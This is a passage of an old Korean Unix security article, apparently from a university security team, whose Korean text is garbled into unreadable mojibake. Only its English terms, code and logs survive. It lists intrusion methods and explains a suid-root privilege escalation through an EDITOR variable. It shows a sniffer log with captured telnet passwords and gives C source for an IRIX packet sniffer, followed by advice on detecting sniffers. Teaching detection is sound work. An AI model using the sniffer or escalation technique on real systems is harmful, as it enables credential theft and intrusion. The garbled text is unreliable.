    ºÒÇÊ¿äÇÑ ¼­ºñ½º¸¦ ¸¹ÀÌ ÇÏ´Â °æ¿ì ÇØÄ¿µéÀÌ Ä§ÀÔÀ» Çϱ⠴õ ÁÁ¾ÆÁö°Ô µÇ¹Ç·Î, °¡±ÞÀûÀÌ¸é ºÒÇÊ¿äÇÑ ¼­ºñ½º´Â ÇÏÁö ¾Ê´Â °Í ÀÌ
    ÁÁ´Ù.(guest ¾ÆÀ̵ð Á¦°øÀ̳ª sonnim ¾ÆÀ̵ð Á¦°ø °°Àº °æ¿ì)
    
    
    º¸¾ÈÀ» °­È­ÇØÁÖ´Â µµ±¸¿¡´Â ¾î¶² °ÍÀÌ ÀÖ³ª (ȤÀº º¸¾ÈÀ» ÀÚµ¿È­ÇØÁÖ´Â ÇÁ·Î±×·¥Àº?)
    
    ¿ì¼± º¸¾ÈÀ» ÀÚµ¿È­ÇØÁÖ´Â ÅøÀº ÀÖÀ» ¼öµµ ¾ø°í, À־µµ ¾ÈµÇ°í, ÀÖÁöµµ ¾Ê´Ù. Àü¼¼°èÀûÀ¸·Î ÄÄÇ»ÅÍ º¸¾ÈÀº È°¹ßÇÑ ¿¬±¸ÀÇ ´ë»óÀÌ µÇ°í
    ÀÖ´Ù. ftp://cert.orgÀ̳ª, ftp://coast.cs.purdue.edu µî¿¡¼­ ÁÁÀº ÅøÀ» ¾òÀ» ¼ö ÀÖ°í ¶Ç KUS ÆÀ µµ
    ¼­¼­È÷ Åø °³¹ßÀ» ½ÃÀÛÇÏ°í ÀÖ´Ù. º¸¾Èµµ±¸´Â Å©°Ô Á¡°Ëµµ±¸¿Í °¨½Ãµµ±¸·Î ³ª´²Áö´Âµ¥ ´Ù½Ã ·ÎÄà ȣ½ºÆ®¿ë°ú ³×Æ®¿öÅ©¿ëÀ¸·Î ³ª´­ ¼ö ÀÖ´Ù.
    
    
        Local host check : cops, tiger, crack
        monitor: tripwire, ttywatcher
        Network check : satan, iss, nfsbug, ypx
        monitor: netlog
        
    ÇØÄ¿°¡ ÄÄÇ»ÅÍ¿¡ ħÀÔÇÏ´Â ¹æ¹ý¿¡´Â ¾î¶² °ÍÀÌ ÀÖ³ª
    
    
        null & default passwd account or passwd guessin

g
        tftp attack
        ethernet sniffing
        /etc/hosts.equiv exploit (ƯÈ÷ SunOS 4.1.x)
        NFS mount attack
        NIS domain name guessing
        Sendmail Attack
        X window System Attack
        WWW Attack
        NFS file handle guessing
        DNS hack
        IP Spoofing
        ±×¿Ü ´Ù¼ö(¿¹: rexd, AIX rlogin -froot...)
        
    ÇØÄ¿°¡ ½´ÆÛÀ¯ÀúÀÇ ±Ç¸®¸¦ ȹµæÇÏ´Â ¹æ¹ý¿¡´Â ¾î¶² °ÍÀÌ ÀÖ³ª.
    
    OS¸¶´Ù ´Ù¸£Áö¸¸ ´ëºÎºÐ Çã¼úÇÑ set-user-id root ÇÁ·Î±×·¥µéÀ» ÀÌ¿ëÇÑ´Ù.
    
    SunOS 4.1.x¸¦ ¿¹¸¦ µé¾îº¸¸é
    
    
        /usr/local/bin/autoreply
        /usr/ucb/rdist
        /bin/mail race
        /bin/passwd race
        /usr/openwin/bin/loadmodule
        sun sendmail 4.1

        sendmail 8.6.9 debug hole
    À§ÀÇ ¸®½ºÆ®´Â ÀϹÝÀûÀ¸·Î Àß ¾Ë·ÁÁø °ÍµéÀε¥ ±×°Íµé ¸»°íµµ suid root ÇÁ·Î±×·¥µéÀ» ÀÏ´Ü ¸ðµÎ ½ºÄµÇغ» ÈÄ OS¿Ü¿¡ ´Ù¸¥ ¼Ò
    ÇÁÆ®¿þ¾î ÀνºÅç °úÁ¤¿¡¼­ »ý±ä °ÍÀÌ ÀÖÀ¸¸é system callµéÀ» ÃßÀûÇϸç Á¶»çÇÑ´Ù. Ȥ, ¼Ò½º ÆÄÀÏÀÌ °°ÀÌ ÀÖ´Ù¸é ÁÁ´Ù.
    
    ¾î´À suid root ÇÁ·Î±×·¥ÀÇ ¼Ò½º Áß¿¡¼­..
    
    
        if (!(editor = getenv("EDITOR")))
        
            editor = "vi";
            
        if (fork())
        
            (void) wait(&junk);
            
        else
        {
        
            (void) execlp(editor, editor, fname, NULL);
            fprintf(stderr, "Whoops! Failed to exec %s\n", editor);
            exit(1);
            
        }
        
        
    À§ÀÇ °æ¿ì¶ó¸é ÇØÄ¿´Â search path list¿¡(current directory)¸¦ ¸Ç óÀ½ ³õ°í

·çÆ® ½©À» ¸¸µå´Â vi ¶ó´Â
    ÀÚ½ÅÀÇ ÇÁ·Î±×·¥À» ¸¸ µç ÈÄ À§ÀÇ suid root ÇÁ·Î±×·¥À»½ÇÇà½ÃŲ´Ù. ±×·¯¸é ·çÆ® ±ÇÇÑÀ¸·Î ÇØÄ¿ÀÇ ÇÁ·Î±×·¥ÀÌ ½ÇÇàµÇ¾î ·çÆ®½©ÀÌ
    ¸¸µé¾îÁø´Ù. /usr/openwin/bin/loadmodule, IRIX 4.0.x ÀÇ /usr/lib/vadmin/serial_port
    µîÀ» ±×¿Í °°Àº Á¶°ÇÀ» ÀÌ¿ëÇؼ­ °ø°ÝÇÑ´Ù.
    
    
    ÄÄÇ»ÅÍ¿¡ ħÀÔÀÚ°¡ ÀÖ´ÂÁö ¾î¶»°Ô ÆľÇÇϴ°¡
    
    °ü¸®ÀÚÀÇ Áö¼ÓÀûÀÎ °ü½ÉÀÌ Áß¿äÇÏ´Ù. ´Ã ½Ã½ºÅÛ ·Î±×¸¦ È®ÀÎÇÏ°í ÆÄÀÏ ½Ã½ºÅÛÀ» ¸ð´ÏÅÍÇÑ´Ù¸é Á¶±ÝÀÌ¶óµµ º¯È­°¡ »ý±â´õ¶óµµ ÆľÇÀÌ °¡´ÉÇÏ´Ù.
    
    
    º¸¾È °ü·Ã µµ±¸¿Í ÀÚ·á´Â ¾îµð¼­ ±¸ÇÒ ¼ö ÀÖ³ª
    
    
        http://www.cert.org
        http://www.8lgm.org
        http://www.cert-kr.or.kr
        news://comp.security.unix
        ftp://ftp.cert.org
        ftp://coast.cs.purdue.edu
        ftp://ftp.cert-kr.or.kr
        
    ÆÄÀ̾î¿ùÀº ¾î´À ¼±±îÁö ½Å·ÚÇÒ ¼ö ÀÖ³ª
    
    ¼³Ä¡¸¦ ÇÏ´Â »ç¶÷ÀÇ º¸¾È Áö½Ä ¹× ÆÄÀ̾î¿ù ÅøŶ ¸Å´º¾ó¿¡ ´ëÇÑ ÀÌÇØ Á¤µµ¿¡ µû¶ó ÆíÂ÷°¡ ½É

ÇÏ´Ù. »ó´ç¼öÀÇ ÆÄÀ̾î¿ùÀº À߸ø ¼Â¾÷µÈ ä
    ¿î¿µµÈ´Ù.
    
    
    ½Ã½ºÅÛ ¹× ³×Æ®¿öÅ© ¸ð´ÏÅ͸µÀ¸·Î ÀÎÇÑ ¼º´ÉÀúÇÏ¿Í °³°³ÀÎÀÇ ÇÁ¶óÀ̹ö½Ã ħÇع®Á¦´Â ¾î¶»°Ô ÇØ°áÇϳª?
    
    ½Ã½ºÅÛ ¸ð´ÏÅ͸µÀ¸·Î ÀÎÇÑ ¼º´É ÀúÇÏ´Â °ÅÀÇ ¾ø´Ù°í º¸¾Æµµ ÁÁ´Ù. ¼¼¼Ç ¸ð´ÏÅÍ ÅøÀÎ ttywatcher³ª ÆÄÀÏ ½Ã½ºÅÛ ¸ð´ÏÅÍ ÅøÀÎ tri
    pwire´Â °ü¸®ÀÚ°¡ ÇÊ¿äÇÒ ¶§ Àá½Ã »ç¿ëÇϰųª cron jobÀ¸·Î ½ÇÇàµÇ±â ¶§¹®¿¡ º°´Ù¸¥ ¿µÇâÀÌ ¾ø´Ù. ±×·¯³ª ³×Æ®¿öÅ© ¸ð´ÏÅ͸µÀº
    ¾öû³­ ¼º´É ÀúÇϸ¦ °¡Á®¿Â´Ù. ½ãÀÇ nit¸¦ »ç¿ëÇϸé ÇÊÅÍ ÆÐÅÏ¿¡ µû¶ó ´Þ¶óÁö±ä ÇÏÁö¸¸ 30~70%±îÁöÀÇ ÆÐŶ ¼Õ½ÇÀÌ »ý±â¹Ç·Î(spr
    ayÇßÀ» ¶§) ³×Æ®¿öÅ©ÂÊÀÇ ÆÛÆ÷¸Õ½º°¡ ¸¹ÀÌ ¶³¾îÁø´Ù. ±×·¡¼­ tcpdump 3.0ºÎÅÍ´Â BPF(BSD Packet Filter)¸¦
    »ç¿ëÇÏ¿© ½ºÅà ±¸Á¶¸¦ »ç¿ëÇÏ´Â SunÀÇ NITº¸´Ù´Â 10~150¹è, CSPF(CMU/Stanford Packet Filter) º¸´Ù´Â
    1.5~20¹è ºü¸¥ ¼º´ÉÇâ»óÀ» °ÅµÎ¾ú´Ù(Comment by chan@ra.snu.ac.kr)
    
    °³ÀÎÀÇ ÇÁ¹ÙÀ̹ö½Ã ħÇØ ¹®Á¦´Â °ü¸®ÀÚÀÇ µµ´ö¼º¿¡ ´Þ·Á Àִµ¥ ¿Ü±¹¿¡¼­´Â ½Ã½ºÅÛ, ȤÀº ½ÃÅ¥¸®Æ¼ °ü¸®ÀÚ´Â ¹Ýµå½Ã ¼±¼­¸¦ °Å Ä£´Ù°í ÇÑ´Ù.
    
    
    º¸¾ÈÀ» ÀϹæÀûÀ¸·Î °­È­ÇÏ´Ù º¸¸é ÄÄÇ»ÅÍÀÇ Æí¸®¼ºÀÌ ¶³¾îÁø´Ù°í Çϴµ¥, ¾î´À ¼±±îÁö º¸¾ÈÀ» °­È­ÇÏ´Â°Ô ¹Ù¶÷Á÷ÇÑ°¡.
    
    ÀÏ·Ê·Î XÀ©µµ¿ì ½Ã½ºÅÛÀÇ º¸¾ÈÀ» °­È­ÇÏ´Â °ÍÀ¸·Î MIT-MAG

IC-COOKIE ¶ó´Â ÅäÅ«¹æ½ÄÀ» ÀÌ¿ëÇÑ xauth¶ó´Â ÇÁ·Î±×·¥ÀÌ ÀÖ´Ù.
    ±×·¯ ³ª ÀÌ°ÍÀÇ »ç¿ë¹æ¹ýÀº °¡È÷ »ìÀÎÀûÀÌ´Ù. X ¾ÖÇø®ÄÉÀ̼ÇÀ» ½ÇÇàÇÒ ¶§¸¶´Ù ÀÏÀÏÀÌ ÅäÅ«À» ³Ñ°ÜÁà¾ß Çϱ⠶§¹®ÀÌ´Ù. µû¶ó¼­ Àû´ç ÇÑ ¼±ÀÌ
    Áß¿äÇÏ´Ù. ±×¸®°í ±×°ÍÀº ÄÄÇ»ÅÍÀÇ Á߿伺¿¡ ¹ÐÁ¢ÇÑ °ü°è°¡ ÀÖ´Ù. ±¹°¡ Á¤º¸±â°üÀÇ È£½ºÆ®¿Í ÀÎÅÍ³Ý ½Ç½À¿ëÀ¸·Î »ç¿ë ÇÏ´Â ´ëÇÐÀÇ ³°Àº
    ¿öÅ©½ºÅ×À̼ÇÀ» ºñ±³Çؼ­ »ý°¢ÇÏ¸é µÈ´Ù. ½ÇÁ¦·Î ±¹³»ÀÇ ¸¹Àº ´ëÇÐÀÇ È£½ºÆ®µéÀº ÀüÇô º¸¾ÈÀÌ °í·ÁµÇ°í ÀÖÁö ¾Ê¾Æ¼­ Ãʺ¸ ÇØÄ¿µéÀÇ ÁÁÀº ¿¬½À
    ´ë»óÀÌ µÇ±âµµ ÇÑ´Ù.
    
    Àû´çÇÑ ¼±À» ½Ç¿ëÀûÀ¸·Î ±ÔÁ¤Áö¾î º»´Ù¸é "°ü¸®ÀÚÀÇ ¸ÞÀϹڽº¿¡ »ç¿ëÀÚµé·ÎºÎÅÍÀÇ ºÒÆò°ú ºÒ¸¸ ¸ÞÀÏÀÌ ½Ã½ºÅÛ ·Î±× ¸®Æ÷ Æ® ¸ÞÀϺ¸´Ù ´õ ¸¹ÀÌ
    ½×ÀÌ´Â ¶§ÀÌ´Ù"
    
    ÃֽŠÇØÅ· À¯Çüµé
    ÃÖ±Ù¿¡´Â ÇØÅ·±â¼úÀÌ °íµµ·Î ¹ß´ÞµÅ ¿¹Àü¿¡´Â »ó»óÇÒ ¼öµµ ¾ø¾ú´ø °í³­µµÀÇ ÇØÅ· ±â¼úµéÀÌ Á¸ÀçÇÏ°Ô µÆ´Ù. ¿¹Àü¿¡´Â ±â²¯ÇغÁ¾ß °ü¸®ÀÚÀÇ ½Ç¼ö³ª
    OS¿¡¼­ ½Ç¼ö¸¦ ÇÑ ÇÁ·Î±×·¥µéÀ» ¾Ç¿ëÇØ °ü¸®ÀÚÀÇ ±ÇÇÑÀ» ¾ò´Â °ÍÀÌ °íÀÛÀ̾úÁö¸¸, ÀÌÁ¦´Â ³×Æ®¿öÅ© »óÀ» Èê·¯´Ù´Ï´Â Á¤º¸ÀÇ ±âº»´ÜÀ§ÀÎ
    ÆÐŶ(packet: ³×Æ®¿öÅ©»ó¿¡ Á¤º¸ ¸¦ ¼Û¼ö½ÅÇÒ ¶§ °¡Àå ±âº»ÀÌ µÇ´Â Á¤º¸´ÜÀ§)À» ÇϳªÇϳª Á¶ÀÛÇØ ÇØÅ·À» ÇÏ°Ô µÆ´Ù.
    
    ÀÌ·± °í³­µµ ÇØÅ·ÀÇ ¿¹´Â ÆÐŶ ½º´ÏÆÛ¸µ(packet sniffing)°ú, IP ½ºÇªÇÎ(IP Spoofing: IP »ç±âÄ¡±â),
    NFS(Network File System) file handle guessing, dns server cache poisoning

(³×ÀÓ
    ¼­¹ö(IP ¿¡ ÀÏ´ëÀÏ ¸ÅÄ¡µÇ´Â ³×ÀÓ ¾îµå·¹½º¸¦ °ü¸®Çϴ ȣ½ºÆ®)¿¡ Àâ ÀÔÇØ°¡Â¥ È£½ºÆ®µéÀ» ¸¸µé°í ³ª¿À´Â °Í) µîÀÌ Àִµ¥ ÀÌÁß¿¡¼­
    ½º´ÏÆÛ¸µ°ú ½ºÇªÇο¡ ´ëÇؼ­¸¸ ´Ù·ï º¸±â·Î ÇÏÀÚ.
    
    
    °¡Àå ½É°¢ÇÑ ÇØÅ· ±â¼ú, Sniffing
    
    ÆÐŶµéÀº ÀÌ´õ³Ý ÄÉÀ̺íÀ» Ÿ°í Àü¼ÛÀÌ µÈ´Ù. ÀÌ ÆÐŶµéÀº ¾î¶² À¯Àú°¡ ¾î´À È£½ºÆ®¿¡ ·Î±äÇß´Ù´Â Á¤º¸µûÀ§¸¦ °¡Áö°í Àִµ¥, ÀÌ´õ³Ý
    µð¹ÙÀ̽º¸¦ ÄÁÆ®·ÑÇØ Èê·¯°¡´Â ÆÐŶ¿¡¼­ ¿øÇÏ´Â Á¤º¸ÀÎ À¯ÀúµéÀÇ Æнº¿öµå¸¦ ¾Ë¾Æ³»´Â °ÍÀ¸·Î¼­ ¿äÁò °¡Àå ½É°¢ÇÑ ¹®Á¦°¡ µÇ´Â ÇØÅ· ±â¼úÀÌ´Ù.
    ÃÖ±Ù ÇØÄ¿µéÀÇ °ø°ÝµéÀÇ Åë°è¸¦ ³»º» ÀڷḦ º¸¸é ½º´ÏÇο¡ ÀÇÇÑ °ø°ÝÀÌ °¡Àå ¸¹Àº °ÍÀ¸·Î ³ªÅ¸³ª°í ÀÖ´Ù.
    
    
    ½º´ÏÆÛ(Sniffer)¶õ ¹«¾ùÀΰ¡?
    
    ½º´ÏÆÛ´Â ³×Å©¿öÅ©ÀÇ ÇÑ È£½ºÆ®¿¡¼­ ½ÇÇàµÇ¾î ±× ÁÖÀ§¸¦ Áö³ª ´Ù´Ï´Â ÆÐŶµéÀ» ¿³º¸´Â ÇÁ·Î±×·¥À¸·Î¼­ °èÁ¤°ú Æнº¿öµå¸¦ ¾Ë¾Æ ³»±â À§Çؼ­
    Ä§ÀÔÀڵ鿡 ÀÇÇØ ÀÚÁÖ »ç¿ëµÇ´Âµ¥ ¾Æ¹«¸® ³×Æ®¿öÅ© º¸¾È¿¡ ½Å°æÀ» ¾´ È£½ºÆ®¶óµµ ÁÖº¯ÀÇ È£½ºÆ®°¡ °ø°Ý´çÇؼ­ ½º´Ï ÇÎÀ» À§ÇØ »ç¿ëµÈ´Ù¸é
    ¹«·ÂÇØÁú ¼ö ¹Û¿¡ ¾ø´Ù. ÀÌÇظ¦ µ½±â À§ÇØ ½ÇÁ¦ ½º´ÏÇÎ ¼¼¼ÇÀ» °¡Áö°í ¼³¸íÇÑ´Ù.
    
    
        mordor# ./sniffit
        
        Log started at => Mon Apr 8 20:29:04 [pid 10937]

        
        -- TCP/IP LOG -- TM: Mon Apr 8 20:29:44 --
        PATH: rohan.kaist.ac.kr(1270) => gondor.kaist.ac.kr(telnet)
        STAT: Mon Apr 8 20:29:48, 30 pkts, 77 bytes [TH_FIN]
        DATA: (255)(253)^C(255)(251)^X(255)(251)^_(255)(251)
        (255)(251)!(255)(251)"(255)(253)^E(255)(251)#(255)(251)$(255)(250)^X
        
            : IRIS-ANSI-NET(255)(240)(255)(253)^A(255)(252)^Aaragorn
            : evenstar
            : cls
            : du -s -k *
            : elm awen
            
        -- TCP/IP LOG -- TM: Mon Apr 8 20:31:57 --
        PATH: mordor.kaist.ac.kr(2389) => gondor.kaist.ac.kr(telnet)
        STAT: Mon Apr 8 20:32:24, 106 pkts, 128 bytes [DATA LIMIT]
        DATA:
        (255)(253)&(255)(251)&(255)(253)^C(255)(251)^X(255)(251)^_(255

)(251)
        (255)(251)!(255)(251)"(255)(251)$(255)(253)^E(255)(251)#(255)(250)^_
        
            : P
            : ^X(255)(240)(255)(250)
            : 9600,9600(255)(240)(255)(250)^X
            : XTERM(255)(240)(255)(253)^A(255)(252)^Agaladriel
            : shwjdtjr=JD
            :
            : setenv DISPLAY rohan.kaist.ac.kr:0.0
            : ne
            
    À§´Â ½º´ÏÆÛ ÇÁ·Î±×·¥À» µ¹¸° °á°úÀÌ´Ù. gondor, mordor, rohanÀº MÇаúÀÇ Àü»ê½ÇÀÇ ±â°èµéÀε¥ ÀÌ¹Ì Ä§ÀÔÀÚ´Â
    mordor¿¡¼­ ·çÆ® ±ÇÇÑÀ» µû³Â¾ú°í ½º´ÏÆÛ ÇÁ·Î±×·¥À» ½ÇÇà½ÃÅ°°í ÀÖ´Ù(½º´ÏÆÛ°¡ µ¿ÀÛÇϱâ À§Çؼ­´Â ³×Å©¿öÅ© µð¹ÙÀ̽ºÀÇ Á¶ÀÛÀÌ ÇÊ¿äÇѵ¥
    ÀÌ´Â ·çÆ®(½Ã½ºÅÛ °ü¸®ÀÚ)¸¸ÀÌ ÇÒ ¼ö ÀÖ´Ù). ±×·¸´Ù¸é ¹°¸®ÀûÀÎ ³×Å©¿öÅ© ±¸µµ¿¡¼­ ÀÎÁ¢ÇØÀִ ȣ½ºÆ®µéÀº ¸ðµÎ ½º´ÏÇÎÀ» ´çÇÏ°Ô µÈ´Ù .
    
    Ã³À½ ºí·°¿¡¼­ rohan¿¡¼­ gondor·Î aragornÀ̶ó´Â °èÁ¤À¸·Î telnet ·Î±äÀ» ÇÑ °ÍÀÌ ÀâÇû´Âµ¥ À̶§ Æнº¿öµå°¡
    evenstarÀÓÀ» ¾Ë ¼ö ÀÖ´Ù. ±×¸®°í ·Î±ä Á÷ÈÄ¿¡ ½ÇÇàÇÑ ¸î¸î ¸í·É±îÁö ÀâÇû´Ù. ÀϹÝÀûÀ¸·Î ½º´ÏÆÛ ÇÁ·Î±×·¥Àº ºñ±³Àû ÀÛÀº Å©±âÀÇ

    Á¦ÇÑµÈ ¹öÆÛ¸¦ »ç¿ëÇϴµ¥ ÇÊ¿ä¿¡ µû¶ó ±×°ÍÀ» ´ÃÀ̱⵵ ÇÑ´Ù.
    
    
    ÀÌ´õ³ÝÀÇ ¼³°è»ó ¾àÁ¡°ú ³×Æ®¿öÅ© ½º´ÏÆÛÀÇ ¿ø¸®
    
    °¡Àå ÀϹÝÀûÀÎ LANÀÇ ±¸¼º ¹æ¹ýÀº ÀÌ´õ³ÝÀ» »ç¿ëÇÏ´Â °ÍÀ¸·Î ÁÖº¯¿¡¼­ °¡Àå ½±°Ô Á¢ÇÏ´Â °æ¿ìÀÌ´Ù. ÀÌ´õ³ÝÀ» ÅëÇÑ Åë½Å ¹æ¹ýÀº ¸Å¿ì
    °£´ÜÇÏ´Ù. A¶ó´Â È£½ºÆ®°¡ B¶ó´Â È£½ºÆ®·Î ÆÐŶÀ» º¸³»°í ½Í´Ù¸é È£½ºÆ® A´Â B¿ÍÀÇ ¹èŸÀûÀÎ ¿¬°áÀ» ÅëÇÏ´Â °ÍÀÌ ¾Æ´Ï¶ó ±× ÆÐŶÀ»
    ÀÌ´õ³Ý¿¡ »Ñ¸°´Ù. ±×¸®°í ±× ÆÐŶÀº ÀϹÝÀûÀ¸·Î ¼ö½Å ÁÖ¼ÒÀÇ È£½ºÆ®¸¸ÀÌ ¹Þµµ·Ï ±â´ëµÈ´Ù. Áï ÀϹÝÀûÀ¸·Î Àڽſ¡°Ô ¿ÀÁö ¾Ê´Â ÆÐŶÀº ¹ÞÁö
    ¾ÊÀ¸¹Ç·Î È£½ºÆ® B¸¸ÀÌ A°¡ º¸³»´Â ÆÐŶÀ» ¹Þ°Ô µÈ´Ù.
    
    ±×·¯³ª ±×°ÍÀº ±â´ë »çÇ×ÀÏ »Ó ¾ðÁ¦¶óµµ ±ú¾îÁú À§ÇèºÎ´ãÀ» ¾È°í ÀÖ´Â ÇÁ·ÎÅäÄÝÀÌ´Ù. ³×Å©¿öÅ© µð¹ÙÀ̽º´Â Àڽſ¡°Ô ¿ÀÁö ¾Ê°í ´Ù¸¥ È£½ºÆ®¸¦
    ÇâÇØ Áö³ª°¡´Â ÆÐŶ±îÁö ¹Þ´Â »óÅ¿¡ µé¾î°¥ ¼ö Àִµ¥, ±×¶§¸¦ 'Promiscuous mode'¶ó°í ºÎ¸¥´Ù. ½º´ÏÆÛ´Â ¹Ù·Î ±× »óÅ¿¡¼­
    µ¿ÀÛÇÑ´Ù. ÀÌ·¸°Ô ³×Æ®¿öÅ©ÀÇ ¼³°è»óÀÇ Ä¿´Ù¶õ ¾àÁ¡ÀÌ Àֱ⠶§¹®¿¡ ½º´ÏÆÛ¿¡ ÀÇÇÑ °ø°ÝÀº Ä¡¸íÀûÀ̸ç ÀϺΠOS¸¦ Á¦ ¿ÜÇÏ°í´Â ã¾Æ³»±â°¡
    °ï¶õÇÑ °æ¿ì°¡ ¸¹°í ¸·±â À§Çؼ­µµ ¸¹Àº ºÎ´ãÀÌ µû¸¥´Ù.
    
    
    ½º´ÏÆÛÀÇ ¼³°è
    
    ½º´ÏÆÛ´Â ³Ê¹«³ª ½±°í, ºñ¿­ÇÏ°Ô ÇØÅ·À» ÇÒ ¼ö Àֱ⠶§¹®¿¡ ÇØÄ¿µé °£¿¡¼­´Â ½º´ÏÆÛ¸¦ ÀÌ¿ëÇÏ´Â ÇØÄ¿¸¦ 3·ù Ãë±ÞÇØ »ó´ëµµ ÇÏÁö ¾Ê´Â´Ù.
    ÀÌó·³ ½º´ÏÆÛ´Â

 ÇØÄ¿µé »çÀÌ¿¡¼­Á¶Â÷ ±Ý±â(?)½ÃµÇ´Â Ä¡»çÇÑ ÇÁ·Î±×·¥ÀÌÁö¸¸ ±× ÀÚü·Î´Â ¾ÆÁÖ ÈǸ¢ÇÑ ³×Å©¿öÅ© ÇÁ·Î±× ·¥ÀÌ´Ù. ½ÇÁ¦·Î
    ´ëºÎºÐÀÇ ³×Æ®¿öÅ© ºÐ¼® ÇÁ·Î±×·¥µéÀº Promiscuous mode¿¡¼­ µ¿ÀÛÇÏ¸ç ¶Ç ±×·² ¼ö¹Û¿¡ ¾ø´Ù.
    
    ±×¸®°í ½º´ÏÆÛÀÇ ÇÙ½ÉÀ» ÀÌ·ç´Â ÄÚµå´Â ´ëºÎºÐÀÇ OS¿¡¼­ µ¶¸³µÈ ÇÁ·ÎÅäÄݷμ­ Áö¿øÀ» Çϴµ¥ SunOSÀÇ NIT, IRIXÀÇ SNOOPÀÌ
    ÁÁÀº ¿¹ÀÌ´Ù. À߸¸ ÀÌ¿ëÇϸé ħÀÔÀÚµéÀ» »ó´ëÇÏ´Â °ü¸®Àڵ鿡°Ô Å«¹«±â°¡ µÉ ¼ö ÀÖ´Ù. ³×Æ®¿öÅ©¸¦ °¨½ÃÇÏ´Â µ¥ »ç¿ëÇÒ ¼ö ÀÖ´Ù´Â ¸» ÀÌ´Ù.
    
    netlog(ftp://ftp.cert-kr.or.kr/pub/tools/etc/netlog/netlog-1.2.tar.gz)¶ó´Â ÁÁÀº
    ÅøÀÌ ÀÌ¹Ì ÀÖ´Ù. ÀÌ ÅøÀÇ ¼º°ÝÀ» Àß ¸»ÇØÁÖµíÀÌ telnet°ú ftpÀÇ ¸ðµâÀº Á¦¿ÜµÅ ÀÖ´Ù. Æнº¿öµå ½º´ÏÇο¡ »ç¿ëµÇ´Â °ÍÀ» ¸·±â À§ÇÔÀÏ
    °ÍÀÌ´Ù.
    
    ½º´ÏÆÛ´Â ÀϹÝÀûÀ¸·Î ´ÙÀ½°ú °°Àº ÀÏ·ÃÀÇ µ¿ÀÛÀ» ÇÏ´Â ÄÚµå·Î ±¸¼ºµÈ´Ù.
    
    
        ³×Æ®¿öÅ© µð¹ÙÀ̽º¸¦ ¿­¾î¼­ Promiscuous mode·Î ¸¸µç´Ù.
        Áö³ª°¡´Â ¸ðµç ÆÐŶÀ» Àд´Ù.
        ÆÐŶÀ» ÇÊÅ͸µÇؼ­ ¹ß½Å ¹× ¼ö½Å ÁÖ¼Ò, ¼­ºñ½º(telnet, rlogin, ftp, smtp µî), ±×¸®°í °èÁ¤°ú Æнº¿öµå°¡
        Æ÷ÇÔµÈ µ¥ÀÌÅ͸¦ ±¸ºÐÇؼ­ Ãâ·ÂÇÑ´Ù.
    3¹øÀÇ ±â´ÉÀ» ÇÏ´Â Äڵ尡 »ý·«µÈ ½º´ÏÆÛ ¼Ò½º¸¦ Âü°í·Î ¼Ò°³ÇÑ´Ù. IRIX¿¡¼­ SNOOPÀ» »ç¿ëÇØ Á¦À۵Ǿú´Ù.

    
    
        /* sgisniff.c by poison@baikdu.kaist.ac.kr
        uses SNOOP(7P)
        tested on IRIX 5.2, 5.3 */
        
        #include <sys/types.h>
        #include <net/raw.h>
        #include <netinet/if_ether.h>
        #define ETHERHDRPAD RAW_HDRPAD(sizeof(struct ether_header))
        
        struct etherpacket {
        
            struct snoopheader snoop;
            char pad[ETHERHDRPAD];
            struct ether_header ether;
            char data[ETHERMTU];
            
        };
        
        main()
        {
        
            int s;
            struct sockaddr_raw sr;
            struct snoopfilter sf;
            struct eth

erpacket ep;
            int cc = 60000, on = 1;
            char buf[100];
            
            s = socket(PF_RAW, SOCK_RAW, RAWPROTO_SNOOP);
            sr.sr_family = AF_RAW;
            sr.sr_port = 0;
            strncpy(sr.sr_ifname, "ec0", sizeof sr.sr_ifname);
            bind(s, &sr, sizeof sr);
            memset((char *)&sf, 0, sizeof sf);
            ioctl(s, SIOCADDSNOOP, &sf);
            setsockopt(s, SOL_SOCKET, SO_RCVBUF, (char *) &cc, sizeof cc);
            ioctl(s, SIOCSNOOPING, &on);
            for (;;) {
            
                cc = read(s, (char *) &ep, sizeof ep);
                write(1, (char *)&ep, sizeof ep);
                sleep(2);
                
            }
            
     

   }
        
        
    ½º´ÏÆÛ, ±× ´ëÃ¥°ú ¿¹¹æ
    
    
    ½º´ÏÆÛ Å½Áö
    
    ½º´ÏÆÛ´Â Promiscuous mode¿¡¼­ µ¿ÀÛÇϱ⠶§¹®¿¡ ³×Å©¿öÅ© µð¹ÙÀ̽ºÀÇ »óÅ Ç÷¡±×¿¡ 'PROMISC'°¡ ÀÖ´Ù¸é ÀÏ´Ü ½º´ÏÆÛ°¡
    µ¹°í ÀÖ´Ù°í »ý°¢Çصµ ÁÁ´Ù. SunOS 4.1.x °°Àº BSD °è¿­ÀÇ À¯´Ð½º³ª IRIX¿¡¼­´Â 'ifconfig'¸¦ »ç¿ëÇؼ­ ½º´ÏÆÛÀÇ
    Á¸À縦 È®ÀÎÇÒ ¼ö ÀÖ À¸³ª ´ëºÎºÐÀÇ ´Ù¸¥ À¯´Ð½º(ƯÈ÷ Solaris)¿¡¼­´Â ±×°ÍÀÌ ºÒ°¡´ÉÇÏ´Ù.
    
    
        [baikdu:/circ/kus/poison 2 ] uname -a
        SunOS baikdu 4.1.3-KL 3 sun4m
        [baikdu:/circ/kus/poison 3 ] ifconfig le0
        le0: flags=163<UP,BROADCAST,NOTRAILERS,RUNNING,PROMISC>
        
            inet 143.248.1.8 netmask ffffff00 broadcast 143.248.1.0
            
        
        [eru:/eldar/people/poison 16 ] uname -a
        IRIX eru 5.3 11091812 IP22 mips
        [eru:/eldar/peopl

e/poison 17 ] ifconfig ec0
        ec0:
        flags=d63<UP,BROADCAST,NOTRAILERS,RUNNING,PROMISC,FILTMULTI,MULTICAST>
        
            inet 134.75.100.53 netmask 0xffff0000 broadcast 134.75.255.255
            
    SunOS 4.1.3, IRIX 5.3 ¿¡¼­ ½º´ÏÆÛ ÇÁ·Î±×·¥À» ½ÇÇà½ÃÅ°¸é¼­ ifconfig·Î È®ÀÎÇÏ¸é ´ÙÀ½°ú °°´Ù.
    
    µÎ ±â°è¿¡¼­ ¸ðµÎ flags¸¦ ³ªÅ¸³»´Â Çà¿¡ 'PROMISC'°¡ ÀÖ´Â °ÍÀ¸·Î ½º´ÏÆÛ°¡ È®ÀεȴÙ. SunOS 4.1.x¿¡¼­ »ç¿ë°¡´ÉÇÑ
    cpmÀ̶ó´Â ÇÁ·Î±×·¥ÀÌ Àִµ¥ ifconfig·Î Ç÷¡±×¸¦ Á¶»çÇÏ´Â °Í°ú °°Àº ±â´ÉÀ» °¡Áø´Ù. ÀϹÝÀûÀ¸·Î ½º´ÏÆÛ´Â ·Î±× ÆÄÀÏÀ» ¸¸µé¾î
